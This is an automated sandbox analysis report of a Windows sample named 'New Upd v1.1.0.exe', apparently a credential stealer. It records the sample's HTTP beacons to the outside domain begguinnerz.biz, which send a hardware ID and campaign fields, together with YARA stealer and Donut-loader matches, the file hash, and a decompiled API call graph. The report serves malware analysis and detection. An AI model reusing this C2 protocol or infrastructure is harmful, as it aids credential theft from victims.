                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f0E9yb%2F%2FV2R7hcT9OxxHdcvmxjSe0FmrZpHC65BANM%2Bggyh3ozHmU2vJuVhfh0tThu6wPlXiTjeDAcYBGI0Uf5U0k0Q6zj3i0OOnigx7N2aSXzXgzyKYmXMPQWrogr3EPL0%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f8cb4058e8878d3-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=9020&min_rtt=2036&rtt_var=5101&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21370&delivery_rate=1434184&cwnd=210&unsent_bytes=0&cid=287440547f0d1cfe&ts=960&x=0"
                                                                              2024-12-27 22:21:22 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                              Data Ascii: fok 8.46.123.189
                                                                              2024-12-27 22:21:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.449743104.21.92.914437576C:\Users\user\Desktop\New Upd v1.1.0.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-27 22:21:24 UTC281OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=PMPBSEGZ713PIJG3D2D
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 1267
                                                                              Host: begguinnerz.biz
                                                                              2024-12-27 22:21:24 UTC1267OUTData Raw: 2d 2d 50 4d 50 42 53 45 47 5a 37 31 33 50 49 4a 47 33 44 32 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 46 34 46 30 30 37 36 31 42 33 31 30 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 50 4d 50 42 53 45 47 5a 37 31 33 50 49 4a 47 33 44 32 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 4d 50 42 53 45 47 5a 37 31 33 50 49 4a 47 33 44 32 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66
                                                                              Data Ascii: --PMPBSEGZ713PIJG3D2DContent-Disposition: form-data; name="hwid"A4F4F00761B3102BBEBA0C6A975F1733--PMPBSEGZ713PIJG3D2DContent-Disposition: form-data; name="pid"1--PMPBSEGZ713PIJG3D2DContent-Disposition: form-data; name="lid"HpOoIh--3f
                                                                              2024-12-27 22:21:25 UTC1122INHTTP/1.1 200 OK
                                                                              Date: Fri, 27 Dec 2024 22:21:25 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=l0uepi8bjsks92k8alfq1gpjvb; expires=Tue, 22 Apr 2025 16:08:04 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GWNF%2FuwBLNYiPxAB5Al6VahG9kaOmgUBC%2BED6Iu5kQzu3RAD5iP9ZHtiSZTJgHUyoXaLcd0ihx9JXxl5BuOIWyWK2Ro4B4QpgYunA3wiSuTN7B6PctDAcLgC8gpbSV1Gv5g%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f8cb415e9a07c84-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1833&min_rtt=1830&rtt_var=694&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2184&delivery_rate=1569048&cwnd=246&unsent_bytes=0&cid=331f128127cb7704&ts=775&x=0"
                                                                              2024-12-27 22:21:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                              Data Ascii: fok 8.46.123.189
                                                                              2024-12-27 22:21:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.449744104.21.92.914437576C:\Users\user\Desktop\New Upd v1.1.0.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-27 22:21:26 UTC279OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=VSLUPTMYCJK38LQB5
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 1113
                                                                              Host: begguinnerz.biz
                                                                              2024-12-27 22:21:26 UTC1113OUTData Raw: 2d 2d 56 53 4c 55 50 54 4d 59 43 4a 4b 33 38 4c 51 42 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 46 34 46 30 30 37 36 31 42 33 31 30 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 56 53 4c 55 50 54 4d 59 43 4a 4b 33 38 4c 51 42 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 56 53 4c 55 50 54 4d 59 43 4a 4b 33 38 4c 51 42 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39
                                                                              Data Ascii: --VSLUPTMYCJK38LQB5Content-Disposition: form-data; name="hwid"A4F4F00761B3102BBEBA0C6A975F1733--VSLUPTMYCJK38LQB5Content-Disposition: form-data; name="pid"1--VSLUPTMYCJK38LQB5Content-Disposition: form-data; name="lid"HpOoIh--3fe7f419
                                                                              2024-12-27 22:21:27 UTC1127INHTTP/1.1 200 OK
                                                                              Date: Fri, 27 Dec 2024 22:21:27 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=runnppf1gtfa6rsl0drsjc1vtp; expires=Tue, 22 Apr 2025 16:08:06 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eQG9bHHoq5L9%2BMi8AUzfV13U7PXPiqKWXQq1ck4fVqRit70iubM%2FPFKBJjQv4CGBa%2F9JMU7BXIUpn7hNk%2FcmspLBVwMXY8krUCfPaWlluIJrUygAf7ztw9Ge2cnDUrGFi98%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f8cb422ffb41835-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1501&min_rtt=1498&rtt_var=569&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2028&delivery_rate=1909744&cwnd=139&unsent_bytes=0&cid=cf03c3a5b77ba1de&ts=1306&x=0"
                                                                              2024-12-27 22:21:27 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                              Data Ascii: fok 8.46.123.189
                                                                              2024-12-27 22:21:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.449745104.21.92.914437576C:\Users\user\Desktop\New Upd v1.1.0.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-27 22:21:29 UTC264OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 121
                                                                              Host: begguinnerz.biz
                                                                              2024-12-27 22:21:29 UTC121OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 41 34 46 34 46 30 30 37 36 31 42 33 31 30 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33
                                                                              Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--3fe7f419a360&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=A4F4F00761B3102BBEBA0C6A975F1733
                                                                              2024-12-27 22:21:30 UTC1126INHTTP/1.1 200 OK
                                                                              Date: Fri, 27 Dec 2024 22:21:29 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=sh3cvdmf6i2abcamvof68sm32o; expires=Tue, 22 Apr 2025 16:08:08 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p5tlm3alTxJjydmnuAMmpZob7vWUFfhi09%2FrQyBJLW1AD7nMhYHcCfMOR%2F5CWenktswyTI99RJJYBOEprzyDR3aGKji8cI9rLmA7765TQgFFdwdOzLr6a1Y9w%2Fnp%2B9atwCc%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f8cb4342aaa8c83-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1808&min_rtt=1800&rtt_var=692&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1021&delivery_rate=1562332&cwnd=189&unsent_bytes=0&cid=83a50cf996b032fa&ts=773&x=0"
                                                                              2024-12-27 22:21:30 UTC54INData Raw: 33 30 0d 0a 2b 34 71 6c 43 77 4f 55 71 77 75 31 43 65 53 43 38 62 67 4a 36 36 39 55 47 55 70 62 62 43 59 41 70 35 71 62 72 59 50 52 61 31 69 67 31 77 3d 3d 0d 0a
                                                                              Data Ascii: 30+4qlCwOUqwu1CeSC8bgJ669UGUpbbCYAp5qbrYPRa1ig1w==
                                                                              2024-12-27 22:21:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to dive into process behavior distribution

                                                                              Target ID:0
                                                                              Start time:17:20:59
                                                                              Start date:27/12/2024
                                                                              Path:C:\Users\user\Desktop\New Upd v1.1.0.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\New Upd v1.1.0.exe"
                                                                              Imagebase:0x400000
                                                                              File size:2'510'896 bytes
                                                                              MD5 hash:3BDF3C4F1CFBB40A395EC5B10D97FAF3
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1888075525.0000000000E1F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1957889164.0000000000B60000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1888319727.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1909433351.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:2.3%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:25.6%
                                                                                Total number of Nodes:722
                                                                                Total number of Limit Nodes:2
                                                                                execution_graph 8458 804080 8461 80d1dd 8458->8461 8460 8040b2 8462 80d1f9 8461->8462 8464 80d215 _strcpy_s 8461->8464 8463 80d1fd _strlen _malloc 8462->8463 8462->8464 8463->8464 8464->8460 8642 801000 8643 80102d 8642->8643 8644 80105e GetSystemTimeAsFileTime 8643->8644 8647 801056 8643->8647 8645 801077 8644->8645 8646 801177 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@ __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@ 8645->8646 8645->8647 8648 801117 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@ 8645->8648 8646->8647 8648->8647 8649 810004 8650 810345 8649->8650 8651 81003a 8649->8651 8652 810351 InterlockedDecrement 8650->8652 8665 810294 8650->8665 8653 810061 __malloc_crt __calloc_crt __calloc_crt __calloc_crt __calloc_crt 8651->8653 8654 810041 ___getlocaleinfo 8651->8654 8652->8665 8657 8100ac 8653->8657 8653->8665 8654->8653 8654->8665 8655 80b245 __crtGetLocaleInfoA_stat 5 API calls 8656 810397 8655->8656 8658 8100e4 GetCPInfo 8657->8658 8657->8665 8662 8100f9 8658->8662 8658->8665 8659 81013c ___crtGetStringTypeA 8660 810168 ___crtLCMapStringA 8659->8660 8659->8665 8661 81019b ___crtLCMapStringA 8660->8661 8660->8665 8663 8101c8 8661->8663 8661->8665 8662->8659 8662->8665 8664 810289 InterlockedDecrement 8663->8664 8663->8665 8664->8665 8665->8655 8465 7ee070 8466 7ee0ab 8465->8466 8467 7ee0bf _strlen 8466->8467 8470 7ee140 8467->8470 8469 7ee0eb 8471 7ee155 8470->8471 8472 7ee1b7 std::_String_base::_Xlen 8471->8472 8473 7ee1bc 8471->8473 8475 7ee15c 8471->8475 8472->8473 8473->8475 8476 80d361 8473->8476 8475->8469 8477 80d373 8476->8477 8479 80d36f 8476->8479 8478 80d3ae _memset 8477->8478 8477->8479 8478->8479 8479->8475 8715 7f9170 8716 7f918f 8715->8716 8717 7f91be 8715->8717 8718 7f92ce 8716->8718 8719 7f91a6 8716->8719 8737 7f91b9 8716->8737 8724 7f9389 DestroyWindow 8717->8724 8717->8737 8720 7f92ed 8718->8720 8721 7f92d7 DeleteObject 8718->8721 8722 7f91ac 8719->8722 8723 7f91ea BeginPaint CreateCompatibleDC SelectObject 8719->8723 8725 7f92f6 DeleteObject 8720->8725 8720->8737 8721->8720 8731 7f9352 8722->8731 8736 7f931a 8722->8736 8722->8737 8727 7f922c SelectPalette RealizePalette 8723->8727 8728 7f924b BitBlt 8723->8728 8724->8737 8725->8737 8726 80b245 __crtGetLocaleInfoA_stat 5 API calls 8732 7f93b6 8726->8732 8727->8728 8729 7f928a SelectObject DeleteDC EndPaint 8728->8729 8730 7f927a SelectPalette 8728->8730 8729->8737 8730->8729 8733 7f9358 GetTickCount 8731->8733 8731->8737 8735 7f9366 KillTimer SendMessageA 8733->8735 8733->8737 8734 7f9335 GetAsyncKeyState 8734->8736 8734->8737 8735->8737 8736->8734 8736->8737 8737->8726 8738 81d18e _LocaleUpdate::_LocaleUpdate __crtGetStringTypeW_stat 8739 81d1c3 8738->8739 8950 815213 8951 81521f __output_l 8950->8951 8952 8154ab MapViewOfFile 8951->8952 8953 8154c1 __alldvrm __output_l 8952->8953 8480 81a095 _LocaleUpdate::_LocaleUpdate 8486 81b201 8480->8486 8483 81a0e7 8492 80b245 8483->8492 8485 81a139 8489 81b269 8486->8489 8491 81b24a 8486->8491 8487 80b245 __crtGetLocaleInfoA_stat 5 API calls 8488 81a0d1 __ld12tod 8487->8488 8488->8483 8489->8491 8500 81d231 8489->8500 8491->8487 8493 80b24d 8492->8493 8494 80b24f IsDebuggerPresent 8492->8494 8493->8485 8496 812578 8494->8496 8497 811d31 SetUnhandledExceptionFilter UnhandledExceptionFilter 8496->8497 8498 811d56 GetCurrentProcess TerminateProcess 8497->8498 8499 811d4e 8497->8499 8498->8485 8499->8498 8503 81d261 8500->8503 8501 80b245 __crtGetLocaleInfoA_stat 5 API calls 8502 81d3fb 8501->8502 8502->8491 8503->8501 8987 814395 8988 81439e 8987->8988 8990 8143a5 8987->8990 8991 8141fb 8988->8991 8992 814207 8991->8992 8993 812069 FindHandler __amsg_exit 8992->8993 8994 814210 8993->8994 8995 81421a getSystemCP 8994->8995 8996 814231 __malloc_crt 8995->8996 9000 81435a __setmbcp 8995->9000 8997 814246 8996->8997 8996->9000 9010 814022 getSystemCP 8997->9010 9000->8990 9011 814059 9010->9011 9012 81404b setSBCS 9010->9012 9014 8140fb _memset 9011->9014 9016 814077 9011->9016 9013 8141e9 9012->9013 9015 80b245 __crtGetLocaleInfoA_stat 5 API calls 9013->9015 9023 8140d8 9014->9023 9017 8141f9 9015->9017 9016->9013 9018 81408f IsValidCodePage 9016->9018 9018->9013 9019 8140a1 GetCPInfo 9018->9019 9020 8140b4 _memset 9019->9020 9021 8141dd 9019->9021 9020->9023 9021->9012 9021->9013 9022 81418f setSBUpLow 9022->9023 9023->9022 8666 818018 8674 812069 8666->8674 8668 818032 _LcidFromHexString GetLocaleInfoA 8669 818066 8668->8669 8673 81806c 8668->8673 8670 80b245 __crtGetLocaleInfoA_stat 5 API calls 8669->8670 8671 8180d3 8670->8671 8672 8180a4 _TestDefaultLanguage 8672->8669 8673->8669 8673->8672 8675 81206f 8674->8675 8676 812075 __amsg_exit 8675->8676 8677 81207d 8675->8677 8676->8677 8677->8668 8504 81309c 8505 8130a8 8504->8505 8506 8130da 8505->8506 8507 8130cd __invoke_watson 8505->8507 8510 813101 8505->8510 8508 8130e0 GetModuleHandleA 8506->8508 8506->8510 8507->8506 8509 8130ef GetProcAddress 8508->8509 8508->8510 8509->8510 9024 7ee360 9025 7ee394 9024->9025 9028 7ee38b 9024->9028 9026 80d177 std::exception::exception 2 API calls 9025->9026 9025->9028 9027 7ee3b4 9026->9027 9029 80d2d2 FindHandler RaiseException 9027->9029 9029->9028 8511 7f7060 8512 7f70a4 8511->8512 8521 7f7250 8512->8521 8522 7f7284 8521->8522 8523 80b245 __crtGetLocaleInfoA_stat 5 API calls 8522->8523 8524 7f78be 8523->8524 8678 7ff4e0 LoadLibraryA 8679 7ff537 8678->8679 8680 7ff4fa GetProcAddress 8678->8680 8680->8679 8681 7ff512 GetDesktopWindow 8680->8681 8681->8679 9030 7ff360 9033 7ff373 9030->9033 9031 7ff388 ResumeThread Sleep SuspendThread _memset GetThreadContext 9031->9033 9032 80b245 __crtGetLocaleInfoA_stat 5 API calls 9034 7ff3fb 9032->9034 9033->9031 9035 7ff3ed 9033->9035 9035->9032 8740 8031a0 8741 8031d5 8740->8741 8744 80d2d2 8741->8744 8743 803205 8745 80d305 RaiseException 8744->8745 8746 80d2f9 8744->8746 8745->8743 8746->8745 8682 809426 8683 80943b 8682->8683 8686 80923e 8683->8686 8687 809274 8686->8687 8690 8091c7 8687->8690 8691 8091e5 8690->8691 8691->8691 8692 80b245 __crtGetLocaleInfoA_stat 5 API calls 8691->8692 8693 80923c 8692->8693 8747 80a1ab __EH_prolog3 8748 80a21a std::ios_base::_Addstd std::locale::_Locimp::_Locimp 8747->8748 8750 80a1c2 std::_Lockit::_Lockit 8747->8750 8749 80a1f4 std::locale::_Setgloballocale 8749->8748 8750->8748 8750->8749 8753 80a109 __EH_prolog3 8750->8753 8754 80a148 std::locale::_Locimp::_Locimp 8753->8754 8754->8749 8530 80a0ad 8531 80a0b6 _Atexit 8530->8531 8532 80a0c1 8530->8532 8531->8532 8694 7f60d0 8695 7f628a 8694->8695 8700 7f6126 8694->8700 8696 7f7250 5 API calls 8695->8696 8697 7f62ef __Stoulx 8696->8697 8702 7f626c 8697->8702 8698 80b245 __crtGetLocaleInfoA_stat 5 API calls 8699 7f63a3 8698->8699 8703 7f84e0 8700->8703 8702->8698 8706 7f8514 8703->8706 8704 80b245 __crtGetLocaleInfoA_stat 5 API calls 8705 7f87da 8704->8705 8705->8702 8706->8704 9036 8193b1 9037 8193cd 9036->9037 9038 8193d5 9037->9038 9039 8193e6 SetFilePointer 9037->9039 9039->9038 9040 8193fe GetLastError 9039->9040 9040->9038 9041 819408 __dosmaperr 9040->9041 9041->9038 9042 8033b0 9043 8033e5 9042->9043 9044 80d2d2 FindHandler RaiseException 9043->9044 9045 803415 9044->9045 8930 81a2b3 8931 81a2dc ___dtold 8930->8931 8938 81c0db 8931->8938 8933 81a2f7 _strcpy_s 8934 81a32d 8933->8934 8935 81a31e __invoke_watson 8933->8935 8936 80b245 __crtGetLocaleInfoA_stat 5 API calls 8934->8936 8935->8934 8937 81a33f 8936->8937 8941 81c14f 8938->8941 8939 80b245 __crtGetLocaleInfoA_stat 5 API calls 8940 81c966 8939->8940 8940->8933 8942 81c16c 8941->8942 8943 81c1b7 _strcpy_s 8941->8943 8945 81c1cf _strcpy_s 8941->8945 8942->8939 8942->8942 8947 81c979 8942->8947 8943->8942 8944 81c223 __invoke_watson 8943->8944 8944->8942 8945->8942 8946 81c1f7 __invoke_watson 8945->8946 8946->8942 9046 8143b3 _LocaleUpdate::_LocaleUpdate 9047 8143e1 __isleadbyte_l 9046->9047 9050 8143d2 9046->9050 9048 814400 ___crtGetStringTypeA 9047->9048 9048->9050 8533 81a4b9 8536 81c0b2 8533->8536 8535 81a4c6 8537 81c0c9 strtoxl 8536->8537 8537->8535 8867 81a13b 8868 81a16e 8867->8868 8869 81a150 8867->8869 8868->8869 8870 81a1dc _strlen 8868->8870 8870->8869 8452 814d3a 8453 814d3f 8452->8453 8454 814ed0 CreateFileMappingA 8453->8454 8455 814f01 __output_l 8454->8455 8456 8154ab MapViewOfFile 8455->8456 8457 8154c1 __alldvrm __output_l 8456->8457 9051 8113ba 9052 8113d7 9051->9052 9053 8113f1 9052->9053 9103 812372 9052->9103 9055 8116c9 9053->9055 9060 812069 FindHandler __amsg_exit 9053->9060 9098 811531 9053->9098 9057 8114f8 9055->9057 9061 8116f5 9055->9061 9115 8112c8 9055->9115 9056 812069 FindHandler __amsg_exit 9059 8116fd 9056->9059 9065 812069 FindHandler __amsg_exit 9057->9065 9059->9057 9063 812372 FindHandler 2 API calls 9059->9063 9062 811438 9060->9062 9061->9056 9062->9057 9067 812069 FindHandler __amsg_exit 9062->9067 9063->9057 9064 811571 _GetRangeOfTrysToCheck 9074 81158a 9064->9074 9066 812337 _abort 9065->9066 9073 81235e 9066->9073 9070 81144a 9067->9070 9069 81162d 9069->9061 9071 811667 IsInExceptionSpec 9069->9071 9072 812069 FindHandler __amsg_exit 9070->9072 9071->9061 9075 811676 9071->9075 9081 811458 9072->9081 9074->9069 9076 8115c8 ___TypeMatch 9074->9076 9109 81125c 9074->9109 9077 812069 FindHandler __amsg_exit 9075->9077 9076->9074 9078 81167b 9077->9078 9079 812069 FindHandler __amsg_exit 9078->9079 9082 811680 9079->9082 9083 812372 FindHandler 2 API calls 9081->9083 9089 811474 9081->9089 9086 812069 FindHandler __amsg_exit 9082->9086 9083->9089 9084 81149e 9085 812069 FindHandler __amsg_exit 9084->9085 9087 8114a3 9085->9087 9088 811685 9086->9088 9092 812069 FindHandler __amsg_exit 9087->9092 9087->9098 9090 812069 FindHandler __amsg_exit 9088->9090 9089->9084 9091 812372 FindHandler 2 API calls 9089->9091 9093 811690 _UnwindNestedFrames ___FrameUnwindToState 9090->9093 9091->9084 9094 8114b5 9092->9094 9093->9055 9096 812069 FindHandler __amsg_exit 9094->9096 9097 8114c0 IsInExceptionSpec 9096->9097 9097->9098 9099 8114d5 type_info::operator== 9097->9099 9098->9055 9098->9064 9098->9069 9099->9057 9100 80d177 std::exception::exception 2 API calls 9099->9100 9101 81151c 9100->9101 9102 80d2d2 FindHandler RaiseException 9101->9102 9102->9098 9104 812326 9103->9104 9105 812069 FindHandler __amsg_exit 9104->9105 9107 812337 _abort 9105->9107 9108 81235e 9107->9108 9108->9053 9110 811272 _UnwindNestedFrames ___FrameUnwindToState 9109->9110 9111 811265 9109->9111 9114 8112b8 9110->9114 9128 8111cb 9111->9128 9114->9074 9116 8112dd 9115->9116 9123 8113b5 9115->9123 9117 812069 FindHandler __amsg_exit 9116->9117 9118 8112e3 9117->9118 9119 81132b 9118->9119 9120 812069 FindHandler __amsg_exit 9118->9120 9121 811339 _GetRangeOfTrysToCheck 9119->9121 9122 812372 FindHandler 2 API calls 9119->9122 9124 8112f1 9120->9124 9121->9123 9125 81135b 9121->9125 9122->9121 9123->9061 9124->9119 9126 811308 _CallSETranslator 9124->9126 9125->9123 9127 81125c CatchIt 8 API calls 9125->9127 9126->9119 9126->9123 9127->9125 9129 8111d7 9128->9129 9136 81104c 9129->9136 9131 811206 9132 81122b ___AdjustPointer 9131->9132 9133 81120c 9131->9133 9135 811229 9132->9135 9134 81120f ___AdjustPointer 9133->9134 9133->9135 9134->9135 9135->9110 9138 811058 9136->9138 9137 81116d 9137->9131 9138->9137 9139 811135 9138->9139 9140 81109f 9138->9140 9143 811152 ___AdjustPointer 9139->9143 9145 811172 9139->9145 9144 8110c5 9140->9144 9140->9145 9141 812372 FindHandler 2 API calls 9141->9137 9142 8110d1 ___AdjustPointer 9142->9137 9143->9137 9144->9137 9144->9142 9145->9137 9145->9141 8755 7ef140 8756 7ef19a 8755->8756 8757 7ef16e 8755->8757 8757->8756 8759 7ef1e0 8757->8759 8766 7ef2e0 8759->8766 8761 7ef275 8764 80b245 __crtGetLocaleInfoA_stat 5 API calls 8761->8764 8762 7ef24c 8762->8761 8772 80a31a 8762->8772 8765 7ef2d4 8764->8765 8765->8756 8769 7ef31b std::_Lockit::_Lockit 8766->8769 8768 7ef419 8768->8762 8770 80d2d2 FindHandler RaiseException 8769->8770 8771 7ef3f9 8769->8771 8770->8771 8777 80a245 _setlocale 8771->8777 8781 8103bf 8772->8781 8778 80a254 8777->8778 8779 80a26e _setlocale 8778->8779 8780 80a27f 8778->8780 8779->8780 8780->8768 8782 812069 FindHandler __amsg_exit 8781->8782 8783 8103c4 8782->8783 8784 80a320 8783->8784 8791 80f2d8 8783->8791 8786 810399 8784->8786 8787 812069 FindHandler __amsg_exit 8786->8787 8788 81039e 8787->8788 8789 80a328 8788->8789 8790 80f2d8 ____lc_codepage_func 21 API calls 8788->8790 8789->8761 8790->8789 8792 80f2e4 8791->8792 8793 812069 FindHandler __amsg_exit 8792->8793 8794 80f2e9 8793->8794 8795 80f317 __lock 8794->8795 8796 80f2fb 8794->8796 8802 80f29a 8795->8802 8798 812069 FindHandler __amsg_exit 8796->8798 8799 80f300 ____lc_codepage_func 8798->8799 8800 80f307 __amsg_exit 8799->8800 8801 80f30f 8799->8801 8800->8801 8801->8784 8803 80f29e 8802->8803 8809 80f2d0 8802->8809 8803->8809 